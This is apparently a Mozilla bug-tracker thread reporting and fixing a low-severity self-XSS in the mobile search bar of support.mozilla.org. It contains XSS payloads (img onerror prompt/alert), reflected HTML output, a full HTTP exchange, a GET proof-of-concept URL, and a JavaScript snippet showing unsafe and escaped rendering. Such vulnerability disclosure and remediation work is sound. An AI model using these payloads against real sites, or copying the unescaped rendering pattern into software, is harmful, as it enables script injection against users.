Closed Bug 1238252 Opened 8 years ago Closed 8 years ago

Self-XSS in support.mozilla.org Mobile Site's Main Search Bar

Categories

(support.mozilla.org :: General, defect)

defect
Not set
normal

Tracking

(Not tracked)

VERIFIED FIXED

People

(Reporter: justashar, Assigned: mythmon)

References

Details

(Keywords: sec-low, wsec-selfxss)

Attachments

(1 file)

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36

Steps to reproduce:

Hi,

I found an XSS in the support.mozilla.org mobile site's main search bar. Open the following URL in any browser:

https://support.mozilla.org/en-US/questions/new/desktop/download-and-install/form?&mobile=1

The site provides a search facility. Inject the following XSS payload in the search bar and hit enter.

'"><img src=x onerror=prompt(document.domain);> 




Actual results:

The site executes JavaScript code. The screenshot is also attached.


Expected results:

There is no output encoding at this time.
Ashar - Thank you for filing this bug regarding the support search functionality.  I have been able to replicate the behavior you suggested and will be performing some additional testing to understand its exploitability for our users.  I will add any additional details I find to this bug.
Safe injection: '"><img src=x onerror=alert('xss');> 

Resulting HTML response containing multiple copies of original injection without output encoding:

</div><div class="results wrapper slide-on-exposed" id="instant-search-content">
  <ol class="search-results">
    
      <li class="document">
        <a href="/en-US/kb/email-notifications-and-inbox-sync?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Email notifications and inbox sync</span>
          Never miss an email again! Here's how to set notifications and sync preferences on your Firefox OS device.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/x-ray-goggles?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">What is X-Ray Goggles</span>
          <b>X</b>-Ray Goggles allow you to see the building blocks that make up websites on the internet, and then remix them into new creations.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/how-customize-new-mail-sound?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">How to Customize the New Mail Sound</span>
          A how-to article on customizing the sound that plays when a new email message is downloaded.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/firefox-no-longer-works-mac-os-x-10-5?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Firefox no longer works with Mac OS X 10.5</span>
          Firefox 16 is the last version of Firefox that works on Mac OS <b>X</b> 10.5 (Leopard).  To stay safe online, we recommend upgrading your computer or operating system.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/install-x-ray-goggles?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">How to Install X-Ray Goggles</span>
          Installing <b>X</b>-Ray Goggles is easy. You can then poke around on any web page and transform it into your own creation! Here's how.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/firefox-no-longer-works-mac-os-10-4-or-powerpc?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Firefox no longer works with Mac OS X 10.4 or PowerPC processors</span>
          Firefox 3.6.28 is the last Firefox version to work on Mac OS <b>X</b> 10.4 or on Mac OS <b>X</b> 10.5 with a PowerPC Mac.  Switch to a newer computer to stay safe online.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/scrolling-issue-firefox-os-x-mavericks?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Scrolling issue on Firefox after upgrading to OS X Mavericks</span>
          This article shows you how to address scrolling issue caused by upgrading to OS <b>X</b> Mavericks.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/ringer-sound-and-vibrate-settings?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Ringer, sound and vibrate settings</span>
          Learn how to change your <b>alerts</b> or ringtones, add songs as ringtones, or turn your phone on vibrate or silent mode.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/inspecting-and-remixing-your-first-web-page?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Inspecting and remixing your first web page</span>
          <b>X</b>-Ray Goggles lets you poke around the elements of a web page and remix them into new creations. Learn how to swap images, text, and more.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/am-i-really-hacking?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Am I really hacking a web page?</span>
          Understand the difference between hacking with <b>X</b>-Ray Goggles, where you fork a copy of a webpage, versus the general term "hacking" where you break into a page.
        </a>
      </li>
    
  </ol>

</div>
Yes. The reflection of the injection in the DOM appears many times and there is no output encoding ...
Summary: XSS in support.mozilla.org Mobile Site's Main Search Bar → DOM-based XSS in support.mozilla.org Mobile Site's Main Search Bar
Ashar - Although I agree there is a lack of output encoding here, which should be fixed, I cannot see a reasonable mechanism for an attacker to leverage such a payload in a practical manner.  It seems like the only reasonable exploitation vector would be for a user to be tricked into typing a malicious payload into the search bar, rather than via a malicious link in, say, a phishing scam.  Do you agree?  If not, could you explain and perhaps provide an example case that would suggest further impact?

Again, many thanks for this submission!
In other words, I'm suggesting that the exploitation vector is limited to Self-XSS (https://en.wikipedia.org/wiki/Self-XSS), but would like your feedback to make sure we're in sync with our understanding.
You're right. It is Self-XSS but I hope it will be fixed.
Keywords: sec-low, wsec-xss
Summary: DOM-based XSS in support.mozilla.org Mobile Site's Main Search Bar → Self-XSS in support.mozilla.org Mobile Site's Main Search Bar
HTTP Request:

GET /en-US/search?format=json&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%27xss%27)%3B%3E+&q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%27xss%27)%3B%3E+ HTTP/1.1
Host: support.mozilla.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://support.mozilla.org/en-US/questions/new/desktop/download-and-install/form?&mobile=1
***REDACTED_SESSION_DATA***
X-Requested-With: XMLHttpRequest
Connection: close

HTTP Response:

HTTP/1.1 200 OK
Server: Apache
Vary: X-Mobile,User-Agent
X-Backend-Server: support2.webapp.phx1.mozilla.com
Cache-Control: no-cache, must-revalidate
Content-Type: application/json
Strict-Transport-Security: max-age=31536000
Public-Key-Pins: max-age=1296000; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18=";
Date: Mon, 11 Jan 2016 15:55:39 GMT
Keep-Alive: timeout=5, max=864
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-XSS-Protection: 1; mode=block
Pragma: no-cache
X-Content-Type-Options: nosniff
Connection: close
X-Robots-Tag: noodp
X-Frame-Options: DENY
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 4288

{"q":"'\"><img src=x onerror=alert('xss');> ","fallback_results":null,"pagination":{"has_next":true,"span":4,"url":"https://support.mozilla.org/en-US/search?q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&format=json","max":10,"number":1,"page_range":[1,2,3,4,5,6,7,8],"has_previous":false,"dotted_upper":true,"num_pages":47,"dotted_lower":false},"total":10,"num_results":467,"w":1,"products":[{"slug":"firefox","title":"Firefox"},{"slug":"mobile","title":"Firefox for Android"},{"slug":"ios","title":"Firefox for iOS"},{"slug":"firefox-os","title":"Firefox OS"},{"slug":"focus-firefox","title":"Focus by Firefox"},{"slug":"thunderbird","title":"Thunderbird"},{"slug":"webmaker","title":"Webmaker"}],"product_titles":"All Products","results":[{"search_summary":"Never miss an email again! Here's how to set notifications and sync preferences on your Firefox OS device.","title":"Email notifications and inbox sync","url":"/en-US/kb/email-notifications-and-inbox-sync","explanation":"","rank":1,"score":0.027203325,"type":"document","id":19233},{"search_summary":"<b>X</b>-Ray Goggles allow you to see the building blocks that make up websites on the internet, and then remix them into new creations.","title":"What is X-Ray Goggles","url":"/en-US/kb/x-ray-goggles","explanation":"","rank":2,"score":0.010656366,"type":"document","id":14438},{"search_summary":"Firefox 16 is the last version of Firefox that works on Mac OS <b>X</b> 10.5 (Leopard).  To stay safe online, we recommend upgrading your computer or operating system.","title":"Firefox no longer works with Mac OS X 10.5","url":"/en-US/kb/firefox-no-longer-works-mac-os-x-10-5","explanation":"","rank":3,"score":0.009599386,"type":"document","id":11507},{"search_summary":"Installing <b>X</b>-Ray Goggles is easy. You can then poke around on any web page and transform it into your own creation! 
Here's how.","title":"How to Install X-Ray Goggles","url":"/en-US/kb/install-x-ray-goggles","explanation":"","rank":4,"score":0.009551151,"type":"document","id":14865},{"search_summary":"A how-to article on customizing the sound that plays when a new email message is downloaded.","title":"How to Customize the New Mail Sound","url":"/en-US/kb/how-customize-new-mail-sound","explanation":"","rank":5,"score":0.009239691,"type":"document","id":17203},{"search_summary":"Firefox 3.6.28 is the last Firefox version to work on Mac OS <b>X</b> 10.4 or on Mac OS <b>X</b> 10.5 with a PowerPC Mac.  Switch to a newer computer to stay safe online.","title":"Firefox no longer works with Mac OS X 10.4 or PowerPC processors","url":"/en-US/kb/firefox-no-longer-works-mac-os-10-4-or-powerpc","explanation":"","rank":6,"score":0.008637331,"type":"document","id":9263},{"search_summary":"This article shows you how to address scrolling issue caused by upgrading to OS <b>X</b> Mavericks.","title":"Scrolling issue on Firefox after upgrading to OS X Mavericks","url":"/en-US/kb/scrolling-issue-firefox-os-x-mavericks","explanation":"","rank":7,"score":0.0076004304,"type":"document","id":20117},{"search_summary":"Learn how to change your <b>alerts</b> or ringtones, add songs as ringtones, or turn your phone on vibrate or silent mode.","title":"Ringer, sound and vibrate settings","url":"/en-US/kb/ringer-sound-and-vibrate-settings","explanation":"","rank":8,"score":0.0020853204,"type":"document","id":13218},{"search_summary":"<b>X</b>-Ray Goggles lets you poke around the elements of a web page and remix them into new creations. Learn how to swap images, text, and more.","title":"Inspecting and remixing your first web page","url":"/en-US/kb/inspecting-and-remixing-your-first-web-page","explanation":"","rank":9,"score":0.00095560943,"type":"document","id":14439},{"search_summary":"On Mac OS <b>X</b> 10.9.5 or higher, Apple shows a security warning for apps that are not installed through the App Store. 
Follow these steps if you see the warning while trying to open a Firefox Marketplace app.","title":"How do I change my Mac Security Settings so I can open Firefox Marketplace apps?","url":"/en-US/kb/mac-security-settings-firefox-marketplace","explanation":"","rank":10,"score":0.00094013184,"type":"document","id":24236}],"lang_name":"English"}
The request/response provided above demonstrates that the request generated by the mobile search bar produces a JSON-typed response, which contains the reflected values that were injected.  I suspect this is then interpreted by the application, resulting in the self-XSS.  If an attacker attempted to weaponize this via a GET URL, it should just result in a JSON response in the browser.

Here's an example GET-based PoC that demonstrates this:

https://support.mozilla.org/en-US/search?format=json&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+

The receiving browser would attempt to parse the JSON and would fail to validate it.
The resulting response page has been served with a proper content type, i.e., Content-Type: application/json, and that's why XSS will not work as far as modern browsers are concerned. The only option left is Self-XSS.
mythmon: Can you have a look at this? Looks like we could improve some of the output encoding for the mobile components of search in support.mozilla.org and address this.
Flags: needinfo?(mcooper)
Jonathan: At first glance, this seems to be a similar issue to bug 1223970. Like in that bug, the search API should not HTML encode the results because those results may be consumed in other contexts. Instead the JS running on the page should be responsible for escaping the content. It should be an easy fix for us to avoid the self-XSS.
Flags: needinfo?(mcooper)
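The split of responsibility mythmon describes (the search API returns raw strings; the page's JavaScript encodes them for the context it renders into) is illustrated below. This is an added example, not kitsune's code or the fix in the linked PR: the function names are hypothetical, and the JSON object is a constructed, trimmed copy of the shape shown in the HTTP response above. The unsafe renderer reproduces the broken `<a href>` seen in the response dump; the safe renderer percent-encodes the query before it enters the URL and HTML-escapes every value before it enters markup.

```javascript
// Added example (not kitsune's code). Constructed, trimmed copy of the
// JSON shape returned by /en-US/search?format=json, using the bug's payload.
const searchResponse = {
  q: "'\"><img src=x onerror=alert('xss');> ",
  results: [
    {
      title: "Email notifications and inbox sync",
      url: "/en-US/kb/email-notifications-and-inbox-sync",
      search_summary: "Never miss an email again! Here's how to set notifications and sync preferences on your Firefox OS device.",
    },
  ],
};

// Buggy pattern (hypothetical name): raw JSON strings concatenated into HTML.
// The raw query lands inside the href attribute, which is exactly what
// produced the broken <a> tags in the response dump above.
function renderResultUnsafe(resp, result) {
  return (
    '<li class="document">' +
    '<a href="' + result.url + '?&s=' + resp.q + '&as=s&__keywords=true">' +
    '<span class="title">' + result.title + '</span>' +
    result.search_summary +
    '</a></li>'
  );
}

// Minimal HTML entity encoder covering text and double-quoted attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Fixed pattern (hypothetical name): the JSON stays unencoded so other
// consumers can use it, and the page encodes each value for where it lands.
// The query goes into a URL query string, so it is percent-encoded first;
// the finished href is then HTML-escaped as an attribute value.
function renderResultSafe(resp, result) {
  const href = result.url + '?&s=' + encodeURIComponent(resp.q) + '&as=s&__keywords=true';
  return (
    '<li class="document">' +
    '<a href="' + escapeHtml(href) + '">' +
    '<span class="title">' + escapeHtml(result.title) + '</span>' +
    escapeHtml(result.search_summary) +
    '</a></li>'
  );
}

// Crude review check: does the rendered markup contain any tag other than
// the ones the template itself emits? Escaped data never matches because
// the "<" has become "&lt;".
function containsUnexpectedTag(html) {
  const allowed = new Set(['li', '/li', 'a', '/a', 'span', '/span']);
  const tags = html.match(/<\/?([a-zA-Z]+)/g) || [];
  return tags.some((t) => !allowed.has(t.slice(1).toLowerCase()));
}

const r = searchResponse.results[0];
console.log('unsafe leaks a tag:', containsUnexpectedTag(renderResultUnsafe(searchResponse, r)));
console.log('safe leaks a tag:  ', containsUnexpectedTag(renderResultSafe(searchResponse, r)));
```

One caveat the response dump makes visible: the `search_summary` field carries server-generated `<b>` highlighting. Escaping it as above drops that formatting, so a real fix has to either have the server guarantee that field is already-safe HTML (with everything except the highlight tags escaped) or have the client sanitize it against an allowlist before inserting it; the query and URL fields have no such excuse and should always be encoded. In a browser, building the nodes with `createElement`, `textContent` and `setAttribute` instead of string concatenation achieves the same context-correct encoding without a hand-written escaper.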
mythmon: that's great, thanks! I agree that JS running on the page should be safely handling the JSON content.
Without mentioning the details (where and how), I only mentioned the bug. Is there something wrong?
PR with a fix here (unmerged, and undeployed): https://github.com/mozilla/kitsune/pull/2771
Is it gonna be fixed?
Ashar - No, there is nothing wrong.  It's our preference that we not share anything about a security bug until it's fixed and published.  I was linking your blog post above for context so those working this bug are aware of its presence.

Lnazi - Yes, it sounds like it's going to be fixed.  See above for mythmon's PR, which is pending review.
Jonathan - Great :). The mobile version of Mozilla.org needs to be fixed, because I stumbled upon a few more vulnerabilities which I will post soon.
:( Mine is a duplicate?
Lnazi - yes, #1238547 is a duplicate, meaning that both submissions target the same code deficiency in the same way (despite variations in the XSS payload).
What are the requirements for bounties or HoF?
Is there any chance for my bugs?
Lnazi - Please see this page for sites and bug types that would be eligible for bounties => https://www.mozilla.org/en-US/security/bug-bounty/faq-webapp/#eligible-bugs
Mine is XSS (DOM based), so do you think there's any chance of a bounty? And when will the security team take action on it?
Lnazi - You are not likely to receive a bounty for #1238547 because Ashar reported this issue first in #1238252.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Assignee: nobody → rdalal
Status: NEW → ASSIGNED
Assignee: rdalal → mcooper
The fix for this has been pushed to production.
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Good. I checked and it is fixed now.
Status: RESOLVED → VERIFIED
Flags: sec-bounty?
This is a self-XSS and rated sec-low as a result. This is not eligible for a bug bounty.
Flags: sec-bounty? → sec-bounty-
Group: websites-security
Keywords: wsec-xss → wsec-selfxss